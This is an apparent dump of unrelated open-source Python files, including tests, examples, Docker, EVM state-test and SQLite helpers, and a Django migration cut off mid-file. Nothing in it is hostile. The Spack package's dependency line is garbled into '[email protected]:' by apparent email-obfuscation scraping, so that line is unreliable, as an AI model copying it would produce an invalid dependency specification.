py/testdir_single_jvm/test_failswith512chunk.py | gigliovale/h2o | 882 | 46575 | <reponame>gigliovale/h2o<gh_stars>100-1000
import unittest, time, sys
# not needed, but in case you move it down to subdir
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_import as h2i
import h2o_browse as h2b
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
h2o.init()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_fail1_100x1100(self):
parseResult = h2i.import_parse(bucket='smalldata', path='fail1_100x11000.csv.gz', schema='put',
timeoutSecs=60, retryDelaySecs=0.15)
if __name__ == '__main__':
h2o.unit_main()
|
running_modes/configurations/reinforcement_learning/reinforcement_learning_components.py | lilleswing/Reinvent-1 | 183 | 46579 | from dataclasses import dataclass
from reinvent_scoring.scoring.diversity_filters.reinvent_core.diversity_filter_parameters import \
DiversityFilterParameters
from reinvent_scoring.scoring.scoring_function_parameters import ScoringFunctionParameters
from running_modes.configurations.reinforcement_learning.inception_configuration import InceptionConfiguration
from running_modes.configurations.reinforcement_learning.reinforcement_learning_configuration import \
ReinforcementLearningConfiguration
@dataclass
class ReinforcementLearningComponents:
"""This class holds the necessary configuration components to run RL"""
reinforcement_learning: ReinforcementLearningConfiguration
scoring_function: ScoringFunctionParameters
diversity_filter: DiversityFilterParameters
inception: InceptionConfiguration
|
examples/how_to/per_round_max_channel.py | haoxusci/starfish | 164 | 46650 | <reponame>haoxusci/starfish<filename>examples/how_to/per_round_max_channel.py
"""
.. _howto_perroundmaxchannel:
Decoding Spots with :py:class:`.PerRoundMaxChannel`
===================================================
:py:class:`.PerRoundMaxChannel` is a :py:class:`.DecodeSpotsAlgorithm` that picks the channel with
maximum signal intensity for each round to construct a barcode and then matches the barcode to
:term:`codewords <Codeword>` in the :term:`codebook <Codebook>`. It is important to
:ref:`normalize<section_normalizing_intensities>` the images prior to
:py:class:`.PerRoundMaxChannel` if the channels have significant differences in range of
intensity values. The returned :py:class:`.DecodedIntensityTable` has a ``distance`` field that
is a decoding quality score. :term:`Spots traces <Feature (Spot, Pixel) Trace>` with higher signal
in non-max channels have a greater ``distance`` value reflecting lower confidence in the decoded
:term:`target <Target>`.
:py:class:`.PerRoundMaxChannel` can be used for linearly multiplexed and one hot multiplexed
:term:`codebooks <Codebook>`. Linearly multiplexed assays (e.g. osmFISH, sequential
smFISH, and RNAscope) can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.SEQUENTIAL``. One hot multiplexed assays (e.g.
in situ sequencing, seqFISH, and STARmap) are termed 'one hot' because every round has exactly one
hot channel. They can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH`` or
``trace_building_strategy=TraceBuildingStrategies.NEAREST_NEIGHBORS``. The example below
demonstrates the recommended method for decoding one hot multiplexed
data using :py:class:`.PerRoundMaxChannel`.
"""
# Load in situ sequencing experiment and find spots
from starfish.image import ApplyTransform, LearnTransform, Filter
from starfish.types import Axes, TraceBuildingStrategies
from starfish import data, FieldOfView
from starfish.spots import FindSpots
experiment = data.ISS()
fov = experiment.fov()
imgs = fov.get_image(FieldOfView.PRIMARY_IMAGES) # primary images
dots = fov.get_image("dots") # reference round for image registration
# filter raw data
masking_radius = 15
filt = Filter.WhiteTophat(masking_radius, is_volume=False)
filt.run(imgs, in_place=True)
filt.run(dots, in_place=True)
# register primary images to reference round
learn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)
transforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func="max"))
warp = ApplyTransform.Warp()
warp.run(imgs, transforms_list=transforms_list, in_place=True)
# run blob detector on dots (reference image with every spot)
bd = FindSpots.BlobDetector(
min_sigma=1,
max_sigma=10,
num_sigma=30,
threshold=0.01,
measurement_type='mean',
)
dots_max = dots.reduce((Axes.ROUND, Axes.ZPLANE), func="max")
spots = bd.run(image_stack=imgs, reference_image=dots_max)
# Decode spots with PerRoundMaxChannel
from starfish.spots import DecodeSpots
decoder = DecodeSpots.PerRoundMaxChannel(
codebook=experiment.codebook,
trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH
)
decoded_intensities = decoder.run(spots=spots) |
Python/sum_prime.py | kennethsequeira/Hello-world | 1,428 | 46652 | <reponame>kennethsequeira/Hello-world<filename>Python/sum_prime.py<gh_stars>1000+
'''
Write a function sumprimes(l) that takes as input a list of integers l and returns the sum of all the prime numbers in l.
Here are some examples to show how your function should work.
>>> sumprimes([3,3,1,13])
19
'''
def sumprimes(l):
prime_sum = int()
for num in l:
if is_prime(num):
prime_sum = prime_sum + num
return prime_sum
def is_prime(n):
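    # Count the divisors of n in 2..n; n is prime exactly when its only such divisor is n itself (0 and 1 yield no divisors and are reported non-prime).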
factor_list = []
for num in range(2, n+1):
if n % num == 0:
factor_list = factor_list + [num]
return len(factor_list) == 1 |
Algorithms/Merge Sort/LinkedListMergeSort.py | TeacherManoj0131/HacktoberFest2020-Contributions | 256 | 46675 | #Program for merge sort in linked list
class Node:
def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def append(self, new_value):
new_node = Node(new_value)
if self.head is None:
self.head = new_node
return
curr_node = self.head
while curr_node.next is not None:
curr_node = curr_node.next
curr_node.next = new_node
def sortedMerge(self, a, b):
result = None
# Base cases
if a == None:
return b
if b == None:
return a
if a.data <= b.data:
result = a
result.next = self.sortedMerge(a.next, b)
else:
result = b
result.next = self.sortedMerge(a, b.next)
return result
#function for merge sort
def mergeSort(self, h):
if h == None or h.next == None:
return h
# get the middle of the list
middle = self.getMiddle(h)
nexttomiddle = middle.next
# set the next of middle node to None
middle.next = None
# Apply mergeSort on left list
left = self.mergeSort(h)
# Apply mergeSort on right list
right = self.mergeSort(nexttomiddle)
# Merge the left and right lists
sortedlist = self.sortedMerge(left, right)
return sortedlist
#get middle element from the linked list
def getMiddle(self, head):
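        # Slow/fast (tortoise-and-hare) traversal: fast advances two nodes per step, so slow stops at the middle when fast reaches the end.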
if (head == None):
return head
slow = head
fast = head
while (fast.next != None and
fast.next.next != None):
slow = slow.next
fast = fast.next.next
return slow
def printList(head):
if head is None:
print(' ')
return
curr_node = head
while curr_node:
print(curr_node.data, end = " ")
curr_node = curr_node.next
print(' ')
# Main Code
if __name__ == '__main__':
li = LinkedList()
li.append(67)
li.append(98)
li.append(45)
li.append(12)
li.append(43)
li.append(17)
# Apply merge Sort
li.head = li.mergeSort(li.head)
print ("Sorted Linked List is:")
printList(li.head)
|
dusty/systems/docker/testing_image.py | gamechanger/dusty | 421 | 46684 | <filename>dusty/systems/docker/testing_image.py<gh_stars>100-1000
from __future__ import absolute_import
import docker
from ...compiler.compose import container_code_path, get_volume_mounts
from ...compiler.spec_assembler import get_expanded_libs_specs
from ...log import log_to_client
from ...command_file import dusty_command_file_name, lib_install_commands_for_app_or_lib
from .common import spec_for_service
from . import get_docker_client
from ... import constants
class ImageCreationError(Exception):
def __init__(self, code):
self.code = code
message = 'Run exited with code {}'.format(code)
super(ImageCreationError, self).__init__(message)
def _ensure_base_image(app_or_lib_name):
testing_spec = _testing_spec(app_or_lib_name)
log_to_client('Getting the base image for the new image')
docker_client = get_docker_client()
if 'image' in testing_spec:
_ensure_image_pulled(testing_spec['image'])
return testing_spec['image']
elif 'build' in testing_spec:
image_tag = 'dusty_testing_base/image'
log_to_client('Need to build the base image based off of the Dockerfile here: {}'.format(testing_spec['build']))
try:
docker_client.remove_image(image=image_tag)
except:
log_to_client('Not able to remove image {}'.format(image_tag))
docker_client.build(path=testing_spec['build'], tag=image_tag)
return image_tag
def _ensure_image_pulled(image_name):
docker_client = get_docker_client()
full_image_name = image_name
if ':' not in image_name:
full_image_name = '{}:latest'.format(image_name)
for image in docker_client.images():
if full_image_name in image['RepoTags']:
break
else:
split = image_name.split(':')
repo, tag = split[0], 'latest' if len(split) == 1 else split[1]
docker_client.pull(repo, tag, insecure_registry=True)
def _get_split_volumes(volumes):
split_volumes = []
for volume in volumes:
volume_list = volume.split(':')
split_volumes.append({'host_location': volume_list[0],
'container_location': volume_list[1]})
return split_volumes
def _get_create_container_volumes(split_volumes):
return [volume_dict['container_location'] for volume_dict in split_volumes]
def _get_create_container_binds(split_volumes):
binds_dict = {}
for volume_dict in split_volumes:
binds_dict[volume_dict['host_location']] = {'bind': volume_dict['container_location'], 'ro': False}
return binds_dict
def _create_tagged_image(base_image_tag, new_image_tag, app_or_lib_name):
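    # Run the Dusty command file in a container started from base_image_tag with the test volumes mounted, stream its logs, then commit and tag the resulting filesystem as new_image_tag.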
docker_client = get_docker_client()
command = _get_test_image_setup_command(app_or_lib_name)
split_volumes = _get_split_volumes(get_volume_mounts(app_or_lib_name, get_expanded_libs_specs(), test=True))
create_container_volumes = _get_create_container_volumes(split_volumes)
create_container_binds = _get_create_container_binds(split_volumes)
container = docker_client.create_container(image=base_image_tag,
command=command,
volumes=create_container_volumes,
host_config=docker.utils.create_host_config(binds=create_container_binds))
docker_client.start(container=container['Id'])
log_to_client('Running commands to create new image:')
for line in docker_client.logs(container['Id'], stdout=True, stderr=True, stream=True):
log_to_client(line.strip())
exit_code = docker_client.wait(container['Id'])
if exit_code:
raise ImageCreationError(exit_code)
new_image = docker_client.commit(container=container['Id'])
try:
docker_client.remove_image(image=new_image_tag)
except:
log_to_client('Not able to remove image {}'.format(new_image_tag))
docker_client.tag(image=new_image['Id'], repository=new_image_tag, force=True)
docker_client.remove_container(container=container['Id'], v=True)
def _testing_spec(app_or_lib_name):
expanded_specs = get_expanded_libs_specs()
return spec_for_service(app_or_lib_name, expanded_specs)['test']
def test_image_name(app_or_lib_name):
return "dusty/test_{}".format(app_or_lib_name)
def _get_test_image_setup_command(app_or_lib_name):
return 'sh {}/{}'.format(constants.CONTAINER_COMMAND_FILES_DIR, dusty_command_file_name(app_or_lib_name))
def test_image_exists(app_or_lib_name):
image_name = test_image_name(app_or_lib_name)
docker_client = get_docker_client()
images = docker_client.images()
for image in images:
# Need to be careful, RepoTags can be explicitly set to None
repo_tags = image.get('RepoTags') or []
if image_name in repo_tags or '{}:latest'.format(image_name) in repo_tags:
return True
return False
def create_test_image(app_or_lib_name):
"""
Create a new test image by applying changes to the base image specified
in the app or lib spec
"""
log_to_client('Creating the testing image')
base_image_tag = _ensure_base_image(app_or_lib_name)
new_image_name = test_image_name(app_or_lib_name)
_create_tagged_image(base_image_tag, new_image_name, app_or_lib_name)
def update_test_image(app_or_lib_name):
"""
Apply updates to an existing testing image that has already been created
by Dusty - updating this test image should be quicker than creating a new
test image from the base image in the spec
"""
log_to_client('Updating the testing image')
if not test_image_exists(app_or_lib_name):
create_test_image(app_or_lib_name)
return
test_image_tag = test_image_name(app_or_lib_name)
_create_tagged_image(test_image_tag, test_image_tag, app_or_lib_name)
|
examples/dir.py | dmytrostriletskyi/design-kit | 107 | 46696 | <gh_stars>100-1000
from accessify import accessify, private
@accessify
class Car:
@private
def start_engine(self):
return 'Engine sound.'
if __name__ == '__main__':
car = Car()
assert 'start_engine' not in dir(car)
|
docs/examples/container/rancher/search_containers.py | dupontz/libcloud | 1,435 | 46701 | <reponame>dupontz/libcloud<gh_stars>1000+
from libcloud.container.types import Provider
from libcloud.container.providers import get_driver
driver = get_driver(Provider.RANCHER)
connection = driver("MYRANCHERACCESSKEY", "MYRANCHERSECRETKEY",
host="172.30.22.1", port=8080, secure=False)
search_results = connection.ex_search_containers(
search_params={"imageUuid": "docker:mysql", "state": "running"})
id_of_first_result = search_results[0]['id']
|
tests/test_analysis/test_plotters.py | martins0n/etna | 326 | 46724 | import numpy as np
import pandas as pd
import pytest
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import TheilSenRegressor
from etna.analysis import get_residuals
from etna.analysis import plot_residuals
from etna.analysis import plot_trend
from etna.analysis.plotters import _get_labels_names
from etna.datasets import TSDataset
from etna.metrics import MAE
from etna.models import LinearPerSegmentModel
from etna.pipeline import Pipeline
from etna.transforms import BinsegTrendTransform
from etna.transforms import LagTransform
from etna.transforms import LinearTrendTransform
from etna.transforms import STLTransform
from etna.transforms import TheilSenTrendTransform
@pytest.fixture
def residuals():
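    # Two-segment series with a constant forecast over the last 90 timestamps; the returned residuals frame equals target minus forecast for each segment.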
timestamp = pd.date_range("2020-01-01", periods=100, freq="D")
df = pd.DataFrame(
{
"timestamp": timestamp.tolist() * 2,
"segment": ["segment_0"] * len(timestamp) + ["segment_1"] * len(timestamp),
"target": np.arange(len(timestamp)).tolist() + (np.arange(len(timestamp)) + 1).tolist(),
}
)
df_wide = TSDataset.to_dataset(df)
ts = TSDataset(df=df_wide, freq="D")
forecast_df = ts[timestamp[10:], :, :]
forecast_df.loc[:, pd.IndexSlice["segment_0", "target"]] = -1
forecast_df.loc[:, pd.IndexSlice["segment_1", "target"]] = 1
residuals_df = ts[timestamp[10:], :, :]
residuals_df.loc[:, pd.IndexSlice["segment_0", "target"]] += 1
residuals_df.loc[:, pd.IndexSlice["segment_1", "target"]] -= 1
return residuals_df, forecast_df, ts
def test_get_residuals(residuals):
"""Test that get_residuals finds residuals correctly."""
residuals_df, forecast_df, ts = residuals
actual_residuals = get_residuals(forecast_df=forecast_df, ts=ts)
assert actual_residuals.to_pandas().equals(residuals_df)
def test_get_residuals_not_matching_lengths(residuals):
"""Test that get_residuals fails to find residuals correctly if ts hasn't answers."""
residuals_df, forecast_df, ts = residuals
ts = TSDataset(df=ts[ts.index[:-10], :, :], freq="D")
with pytest.raises(KeyError):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_get_residuals_not_matching_segments(residuals):
"""Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ."""
residuals_df, forecast_df, ts = residuals
columns_frame = forecast_df.columns.to_frame()
columns_frame["segment"] = ["segment_0", "segment_3"]
forecast_df.columns = pd.MultiIndex.from_frame(columns_frame)
with pytest.raises(KeyError, match="Segments of `ts` and `forecast_df` should be the same"):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_plot_residuals_fails_unknown_feature(example_tsdf):
"""Test that plot_residuals fails if meet unknown feature."""
pipeline = Pipeline(
model=LinearPerSegmentModel(), transforms=[LagTransform(in_column="target", lags=[5, 6, 7])], horizon=5
)
metrics, forecast_df, info = pipeline.backtest(ts=example_tsdf, metrics=[MAE()], n_folds=3)
with pytest.raises(ValueError, match="Given feature isn't present in the dataset"):
        plot_residuals(forecast_df=forecast_df, ts=example_tsdf, feature="unknown_feature")
@pytest.mark.parametrize(
"poly_degree, trend_transform_class",
(
[1, LinearTrendTransform],
[2, LinearTrendTransform],
[1, TheilSenTrendTransform],
[2, TheilSenTrendTransform],
),
)
def test_plot_trend(poly_degree, example_tsdf, trend_transform_class):
plot_trend(ts=example_tsdf, trend_transform=trend_transform_class(in_column="target", poly_degree=poly_degree))
@pytest.mark.parametrize("detrend_model", (TheilSenRegressor(), LinearRegression()))
def test_plot_bin_seg(example_tsdf, detrend_model):
plot_trend(ts=example_tsdf, trend_transform=BinsegTrendTransform(in_column="target", detrend_model=detrend_model))
@pytest.mark.parametrize("period", (7, 30))
def test_plot_stl(example_tsdf, period):
plot_trend(ts=example_tsdf, trend_transform=STLTransform(in_column="target", period=period))
@pytest.mark.parametrize(
"poly_degree, expect_values, trend_class",
(
[1, True, LinearTrendTransform],
[2, False, LinearTrendTransform],
[1, True, TheilSenTrendTransform],
[2, False, TheilSenTrendTransform],
),
)
def test_get_labels_names_linear_coeffs(example_tsdf, poly_degree, expect_values, trend_class):
ln_tr = trend_class(in_column="target", poly_degree=poly_degree)
example_tsdf.fit_transform([ln_tr])
segments = example_tsdf.segments
_, linear_coeffs = _get_labels_names([ln_tr], segments)
if expect_values:
assert list(linear_coeffs.values()) != ["", ""]
else:
assert list(linear_coeffs.values()) == ["", ""]
|
var/spack/repos/builtin/packages/py-flit-core/package.py | zygyz/spack | 348 | 46740 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import glob
import os
import zipfile
from spack import *
class PyFlitCore(PythonPackage):
"""Distribution-building parts of Flit."""
homepage = "https://github.com/takluyver/flit"
url = "https://github.com/takluyver/flit/archive/refs/tags/3.3.0.tar.gz"
maintainers = ['takluyver']
version('3.3.0', sha256='f5340b268563dd408bf8e2df6dbc8d4d08bc76cdff0d8c7f8a4be94e5f01f22f')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-toml', type=('build', 'run'))
def build(self, spec, prefix):
with working_dir('flit_core'):
python('build_dists.py')
def install(self, spec, prefix):
wheel = glob.glob(os.path.join('flit_core', 'dist', '*.whl'))[0]
with zipfile.ZipFile(wheel) as f:
f.extractall(python_purelib)
|
examples/null_support/client.py | amrhgh/django-grpc-framework | 269 | 46745 | <gh_stars>100-1000
import grpc
import snippets_pb2
import snippets_pb2_grpc
from google.protobuf.struct_pb2 import NullValue
with grpc.insecure_channel('localhost:50051') as channel:
stub = snippets_pb2_grpc.SnippetControllerStub(channel)
request = snippets_pb2.Snippet(id=1, title='snippet title')
# send non-null value
# request.language.value = "python"
# send null value
request.language.null = NullValue.NULL_VALUE
response = stub.Update(request)
print(response, end='')
|
ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 308 | 46747 | # Service info
APP = "vertica"
|
quarkchain/evm/tests/new_statetest_utils.py | QuarkChain/pyquarkchain | 237 | 46755 | <reponame>QuarkChain/pyquarkchain
import sys
from quarkchain.evm.state import State
from quarkchain.evm.common import FakeHeader
from quarkchain.evm.utils import (
decode_hex,
parse_int_or_hex,
sha3,
to_string,
remove_0x_head,
encode_hex,
big_endian_to_int,
)
from quarkchain.evm.config import default_config, Env
from quarkchain.config import get_default_evm_config
from quarkchain.evm.exceptions import InvalidTransaction
import quarkchain.evm.transactions as transactions
from quarkchain.evm.messages import apply_transaction
from quarkchain.evm.specials import specials, configure_special_contract_ts
import copy
import os
from quarkchain.db import InMemoryDb
from quarkchain.utils import token_id_encode
config_string = ":info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug"
konfig = copy.copy(default_config)
# configure_logging(config_string=config_string)
fixture_path = os.path.join(os.path.dirname(__file__), "../..", "fixtures")
fake_headers = {}
def mk_fake_header(blknum):
if blknum not in fake_headers:
fake_headers[blknum] = FakeHeader(sha3(to_string(blknum)))
return fake_headers[blknum]
basic_env = {
"currentCoinbase": "0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba",
"currentDifficulty": "0x020000",
"currentGasLimit": "0x7fffffffffffffff",
"currentNumber": "0x01",
"currentTimestamp": "0x03e8",
"previousHash": "0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6",
}
evm_config = get_default_evm_config()
network_to_test = {"ConstantinopleFix"}
# Makes a diff between a prev and post state
def mk_state_diff(prev, post):
o = {}
for k in prev.keys():
if k not in post:
o[k] = ["-", prev[k]]
for k in post.keys():
if k not in prev:
o[k] = ["+", post[k]]
elif prev[k] != post[k]:
ok = {}
for key in ("nonce", "token_balances", "code"):
if prev[k][key] != post[k][key]:
ok[key] = [prev[k][key], "->", post[k][key]]
if prev[k]["storage"] != post[k]["storage"]:
ok["storage"] = {}
for sk in prev[k]["storage"].keys():
if sk not in post[k]["storage"]:
ok["storage"][sk] = ["-", prev[k]["storage"][sk]]
for sk in post[k]["storage"].keys():
if sk not in prev[k]["storage"]:
ok["storage"][sk] = ["+", post[k]["storage"][sk]]
else:
ok["storage"][sk] = [
prev[k]["storage"][sk],
"->",
post[k]["storage"][sk],
]
o[k] = ok
return o
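# Illustrative shape of the diff returned above (addresses/values are made up):
#   {"0xabc...": {"nonce": [0, "->", 1],
#                 "storage": {"0x01": ["+", "0x02"], "0x03": ["-", "0x04"]}},
#    "0xdef...": ["+", {...}]}
# "-"/"+" mark accounts or storage slots present only in `prev`/`post`,
# while [old, "->", new] marks fields that changed between the two snapshots.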
# Compute a single unit of a state test
def compute_state_test_unit(state, txdata, indices, konfig, is_qkc_state, qkc_env=None):
state.env.config = konfig
s = state.snapshot()
if "transferTokenId" in txdata:
transfer_token_id = parse_int_or_hex(
txdata["transferTokenId"][indices["transferTokenId"]]
)
else:
transfer_token_id = token_id_encode("QKC")
try:
# Create the transaction
tx = transactions.Transaction(
nonce=parse_int_or_hex(txdata["nonce"] or b"0"),
gasprice=parse_int_or_hex(txdata["gasPrice"] or b"0"),
startgas=parse_int_or_hex(txdata["gasLimit"][indices["gas"]] or b"0"),
to=decode_hex(remove_0x_head(txdata["to"])),
value=parse_int_or_hex(txdata["value"][indices["value"]] or b"0"),
data=decode_hex(remove_0x_head(txdata["data"][indices["data"]])),
gas_token_id=token_id_encode("QKC"),
transfer_token_id=transfer_token_id,
# Should not set testing flag if testing QuarkChain state
is_testing=not is_qkc_state,
)
tx.set_quark_chain_config(qkc_env.quark_chain_config)
if "secretKey" in txdata:
tx.sign(decode_hex(remove_0x_head(txdata["secretKey"])))
else:
tx._in_mutable_context = True
tx.v = parse_int_or_hex(txdata["v"])
tx._in_mutable_context = False
# Run it
prev = copy.deepcopy(state.to_dict())
success, output = apply_transaction(state, tx, tx_wrapper_hash=bytes(32))
except InvalidTransaction as e:
print("Exception: %r" % e)
success, output = False, b""
# touch coinbase, make behavior consistent with go-ethereum
state.delta_token_balance(state.block_coinbase, token_id_encode("QKC"), 0)
state.commit()
post = state.to_dict()
output_decl = {
"hash": "0x" + encode_hex(state.trie.root_hash),
"indexes": indices,
"diff": mk_state_diff(prev, post),
}
state.revert(s)
return output_decl
# Initialize the state for state tests
def init_state(env, pre, is_qkc_state, qkc_env=None):
# Setup env
db = InMemoryDb()
state_env = Env(config=konfig)
state_env.db = db
state = State(
env=state_env,
block_prevhash=decode_hex(remove_0x_head(env["previousHash"])),
prev_headers=[
mk_fake_header(i)
for i in range(
parse_int_or_hex(env["currentNumber"]) - 1,
max(-1, parse_int_or_hex(env["currentNumber"]) - 257),
-1,
)
],
block_number=parse_int_or_hex(env["currentNumber"]),
block_coinbase=decode_hex(remove_0x_head(env["currentCoinbase"])),
block_difficulty=parse_int_or_hex(env["currentDifficulty"]),
gas_limit=parse_int_or_hex(env["currentGasLimit"]),
timestamp=parse_int_or_hex(env["currentTimestamp"]),
qkc_config=qkc_env.quark_chain_config,
# If testing QuarkChain states, should not use mock account
use_mock_evm_account=not is_qkc_state,
)
if "overrides" in env:
if "specialContractTimestamp" in env["overrides"]:
for overrides in env["overrides"]["specialContractTimestamp"]:
configure_special_contract_ts(
specials,
bytes.fromhex(overrides["address"]),
overrides["timestamp"],
)
seen_token_ids = set()
# Fill up pre
for address, h in list(pre.items()):
assert len(address) in (40, 42)
address = decode_hex(remove_0x_head(address))
state.set_nonce(address, parse_int_or_hex(h["nonce"]))
if is_qkc_state and "balances" in h:
# In QuarkChain state tests, can either specify balance map or single balance
for token_id, balance in h["balances"].items():
parsed_token_id = parse_int_or_hex(token_id)
state.set_token_balance(
address, parsed_token_id, parse_int_or_hex(balance)
)
seen_token_ids.add(parsed_token_id)
else:
state.set_balance(address, parse_int_or_hex(h["balance"]))
state.set_code(address, decode_hex(remove_0x_head(h["code"])))
for k, v in h["storage"].items():
state.set_storage_data(
address,
big_endian_to_int(decode_hex(k[2:])),
big_endian_to_int(decode_hex(v[2:])),
)
# Update allowed token IDs
if seen_token_ids:
state.qkc_config._allowed_token_ids = seen_token_ids
state.commit(allow_empties=True)
return state
class EnvNotFoundException(Exception):
pass
def verify_state_test(test):
print("Verifying state test")
if "env" not in test:
raise EnvNotFoundException("Env not found")
_state = init_state(test["env"], test["pre"], test["qkcstate"], qkc_env=test["qkc"])
for config_name, results in test["post"].items():
# Old protocol versions may not be supported
if config_name not in network_to_test:
continue
print("Testing for %s" % config_name)
for result in results:
data = test["transaction"]["data"][result["indexes"]["data"]]
if len(data) > 2000:
data = "data<%d>" % (len(data) // 2 - 1)
print(
"Checking for values: g %d v %d d %s (indexes g %d v %d d %d)"
% (
parse_int_or_hex(
test["transaction"]["gasLimit"][result["indexes"]["gas"]]
),
parse_int_or_hex(
test["transaction"]["value"][result["indexes"]["value"]]
),
data,
result["indexes"]["gas"],
result["indexes"]["value"],
result["indexes"]["data"],
)
)
computed = compute_state_test_unit(
_state,
test["transaction"],
result["indexes"],
evm_config,
test["qkcstate"],
qkc_env=test["qkc"],
)
if computed["hash"][-64:] != result["hash"][-64:]:
for k in computed["diff"]:
print(k, computed["diff"][k], file=sys.stderr)
print(test["filename"], test["testname"], file=sys.stderr)
raise Exception(
"Hash mismatch, computed: %s, supplied: %s"
% (computed["hash"], result["hash"])
)
else:
for k in computed["diff"]:
print(k, computed["diff"][k])
print("Hash matched!: %s" % computed["hash"])
return True
|
spotpy/database/sql.py | cheginit/spotpy | 182 | 46843 | <filename>spotpy/database/sql.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import sqlite3
import sys
from .base import database
if sys.version_info[0] >= 3:
unicode = str
class PickalableSWIG:
def __setstate__(self, state):
self.__init__(*state['args'])
def __getstate__(self):
return {'args': self.args}
class PickalableSQL3Connect(sqlite3.Connection, PickalableSWIG):
def __init__(self, *args,**kwargs):
self.args = args
sqlite3.Connection.__init__(self,*args,**kwargs)
class PickalableSQL3Cursor(sqlite3.Cursor, PickalableSWIG):
def __init__(self, *args,**kwargs):
self.args = args
sqlite3.Cursor.__init__(self,*args,**kwargs)
class sql(database):
"""
    This class saves the sampling results in an SQLite database file on disk.
    It can be used if data safety matters.
"""
def __init__(self, *args, **kwargs):
import os
# init base class
super(sql, self).__init__(*args, **kwargs)
        # Create an open file, which needs to be closed after the sampling
try:
os.remove(self.dbname + '.db')
except:
pass
self.db = PickalableSQL3Connect(self.dbname + '.db')
self.db_cursor = PickalableSQL3Cursor(self.db)
# Create Table
# self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS '''+self.dbname+'''
# (like1 real, parx real, pary real, simulation1 real, chain int)''')
self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS ''' + self.dbname + '''
(''' + ' real ,'.join(self.header) + ''')''')
def save(self, objectivefunction, parameterlist, simulations=None, chains=1):
coll = (self.dim_dict['like'](objectivefunction) +
self.dim_dict['par'](parameterlist) +
self.dim_dict['simulation'](simulations) +
[chains])
# Apply rounding of floats
coll = map(self.db_precision, coll)
self.db_cursor.execute(
"INSERT INTO " + self.dbname + " VALUES (" + '"' + str('","'.join(map(str, coll))) + '"' + ")")
self.db.commit()
def finalize(self):
self.db.close()
def getdata(self):
self.db = PickalableSQL3Connect(self.dbname + '.db')
self.db_cursor = PickalableSQL3Cursor(self.db)
if sys.version_info[0] >= 3:
headers = [(row[1], "<f8") for row in
self.db_cursor.execute("PRAGMA table_info(" + self.dbname + ");")]
else:
# Workaround for python2
headers = [(unicode(row[1]).encode("ascii"), unicode("<f8").encode("ascii")) for row in
self.db_cursor.execute("PRAGMA table_info(" + self.dbname + ");")]
back = np.array([row for row in self.db_cursor.execute('SELECT * FROM ' + self.dbname)], dtype=headers)
self.db.close()
return back
|
nominations/migrations/0001_initial.py | ewjoachim/pythondotorg | 911 | 46844 | <gh_stars>100-1000
# Generated by Django 2.0.9 on 2019-03-18 20:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import markupfield.fields
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Election",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=100)),
("date", models.DateField()),
("nominations_open_at", models.DateTimeField(blank=True, null=True)),
("nominations_close_at", models.DateTimeField(blank=True, null=True)),
("slug", models.SlugField(blank=True, max_length=255, null=True)),
],
options={"ordering": ["-date"]},
),
migrations.CreateModel(
name="Nomination",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=1024, null=True)),
("email", models.CharField(max_length=1024, null=True)),
(
"previous_board_service",
models.CharField(max_length=1024, null=True),
),
("employer", models.CharField(max_length=1024, null=True)),
(
"other_affiliations",
models.CharField(blank=True, max_length=2048, null=True),
),
(
"nomination_statement",
markupfield.fields.MarkupField(null=True, rendered_field=True),
),
(
"nomination_statement_markup_type",
models.CharField(
choices=[
("", "--"),
("html", "HTML"),
("plain", "Plain"),
("markdown", "Markdown"),
("restructuredtext", "Restructured Text"),
],
default="markdown",
editable=False,
max_length=30,
),
),
(
"_nomination_statement_rendered",
models.TextField(editable=False, null=True),
),
("accepted", models.BooleanField(default=False)),
("approved", models.BooleanField(default=False)),
(
"election",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="nominations.Election",
),
),
(
"nominator",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="nominations_made",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.CreateModel(
name="Nominee",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("accepted", models.BooleanField(default=False)),
("approved", models.BooleanField(default=False)),
("slug", models.SlugField(blank=True, max_length=255, null=True)),
(
"election",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="nominees",
to="nominations.Election",
),
),
(
"user",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="nominations_recieved",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.AddField(
